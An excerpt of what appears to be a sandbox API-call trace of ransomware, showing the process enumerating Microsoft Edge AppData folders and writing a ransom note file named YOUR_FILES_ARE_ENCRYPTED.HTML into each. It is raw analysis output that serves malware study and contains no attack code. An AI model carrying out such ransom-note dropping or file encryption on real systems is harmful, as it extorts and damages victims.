dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0116.216] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0116.220] CloseHandle (hObject=0x31c) returned 1 [0116.220] GetProcessHeap () returned 0x600000 [0116.220] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.220] GetProcessHeap () returned 0x600000 [0116.220] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3102fc8 | out: hHeap=0x600000) returned 1 [0116.220] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0116.220] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.220] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\LocalState") returned 106 [0116.220] GetProcessHeap () returned 0x600000 [0116.220] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3102fc8 [0116.220] lstrcpyW (in: lpString1=0x3102fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\LocalState" [0116.220] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\LocalState\\*" [0116.220] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\LocalState\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185660, dwReserved1=0x31855a0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0116.220] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185660, dwReserved1=0x31855a0, cFileName="..", cAlternateFileName="")) returned 1 [0116.220] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185660, dwReserved1=0x31855a0, cFileName="..", cAlternateFileName="")) returned 0 [0116.220] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0116.221] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 136 [0116.221] GetProcessHeap () returned 0x600000 [0116.221] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.221] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\#!001\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0116.221] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0116.223] CloseHandle (hObject=0x31c) returned 1 [0116.223] GetProcessHeap () returned 0x600000 [0116.223] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.223] GetProcessHeap () returned 0x600000 [0116.223] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3102fc8 | out: hHeap=0x600000) returned 1 [0116.223] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="Temp", cAlternateFileName="")) returned 1 [0116.223] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.223] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\Temp") returned 100 [0116.223] GetProcessHeap () returned 0x600000 [0116.223] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3102fc8 [0116.223] lstrcpyW (in: lpString1=0x3102fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\Temp" [0116.223] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\Temp\\*" [0116.223] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\Temp\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185660, dwReserved1=0x31855a0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.223] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185660, dwReserved1=0x31855a0, cFileName="..", cAlternateFileName="")) returned 1 [0116.223] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185660, dwReserved1=0x31855a0, cFileName="..", cAlternateFileName="")) returned 0 [0116.223] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.224] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0116.224] GetProcessHeap () returned 0x600000 [0116.224] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.224] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\#!001\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0116.224] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0116.225] CloseHandle (hObject=0x31c) returned 1 [0116.225] GetProcessHeap () returned 0x600000 [0116.225] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.225] GetProcessHeap () returned 0x600000 [0116.225] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3102fc8 | out: hHeap=0x600000) returned 1 [0116.226] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0116.226] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.226] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\TempState") returned 105 [0116.226] GetProcessHeap () returned 0x600000 [0116.226] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3102fc8 [0116.227] lstrcpyW (in: lpString1=0x3102fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\TempState" [0116.227] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\TempState\\*" [0116.227] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\TempState\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185660, dwReserved1=0x31855a0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.227] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185660, dwReserved1=0x31855a0, cFileName="..", cAlternateFileName="")) returned 1 [0116.227] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185660, dwReserved1=0x31855a0, cFileName="..", cAlternateFileName="")) returned 0 [0116.227] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.227] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 135 [0116.227] GetProcessHeap () returned 0x600000 [0116.227] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\#!001\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0116.228] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0116.229] CloseHandle (hObject=0x31c) returned 1 [0116.229] GetProcessHeap () returned 0x600000 [0116.229] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.229] GetProcessHeap () returned 0x600000 [0116.229] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3102fc8 | out: hHeap=0x600000) returned 1 [0116.230] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0116.230] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.230] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0116.230] GetProcessHeap () returned 0x600000 [0116.230] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\#!001\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.231] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.231] CloseHandle (hObject=0x32c) returned 1 [0116.232] GetProcessHeap () returned 0x600000 [0116.232] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.232] GetProcessHeap () returned 0x600000 [0116.232] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.233] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x88079316, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88079316, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88079316, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0116.233] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.233] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetCache") returned 99 [0116.233] GetProcessHeap () returned 0x600000 [0116.233] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.234] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetCache" [0116.234] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetCache\\*" [0116.234] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x88079316, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88079316, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88079316, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName=".", cAlternateFileName="")) returned 0x626978 [0116.234] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x88079316, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88079316, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88079316, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="..", cAlternateFileName="")) returned 1 [0116.234] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x88079316, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88079316, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88079316, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="..", cAlternateFileName="")) returned 0 [0116.234] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0116.235] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0116.235] GetProcessHeap () returned 0x600000 [0116.235] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.235] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.236] CloseHandle (hObject=0x32c) returned 1 [0116.237] GetProcessHeap () returned 0x600000 [0116.237] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.237] GetProcessHeap () returned 0x600000 [0116.237] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.237] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x88079316, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88079316, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88079316, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0116.237] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.237] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: 